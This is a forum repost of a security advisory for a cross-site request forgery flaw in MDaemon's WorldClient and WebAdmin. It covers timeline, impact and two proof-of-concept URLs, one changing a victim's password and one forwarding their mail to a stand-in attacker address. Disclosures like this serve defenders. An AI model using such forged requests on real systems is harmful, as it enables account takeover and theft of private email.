Praetorian503 Posted February 21, 2013 Report Posted February 21, 2013 Alt-N MDaemon version 13.0.3 WorldClient and WebAdmin applications suffer from a cross site request forgery vulnerability.===================================================================================== Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request ForgeryVulnerability=====================================================================================Software: Alt-N MDaemon v13.0.3 and prior versionsVendor: http://www.altn.com/Vuln Type: Cross-Site Request ForgeryRemote: YesLocal: NoDiscovered by: QSecure and Demetris PapapetrouReferences: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_and_WebAdmin_CSRF.htmlDiscovered: 25/07/2012Reported: 19/12/2012Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html)Disclosed: 18/02/2013VULNERABILITY DESCRIPTION:==========================Alt-N WorldClient and WebAdmin applications are prone to a cross-siterequest-forgery vulnerability. It should be noted that partialprotection is provided by the Session parameter, but this alone cannotbe considered as an adequate protection mechanism.An attacker can exploit this issue to perform different actions on theaffected application without the user's consent. For example, theattacker can change the user's password, forward a copy of the user'semails to a different email account, retrieve his/her address book,send email messages to other users/email addresses and/or performother similar tasks.Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable;other versions may also be affected.PoC Exploit:============Change Password:http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1nEnable Forwarding:http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=evil%40example.comSource: PacketStorm Quote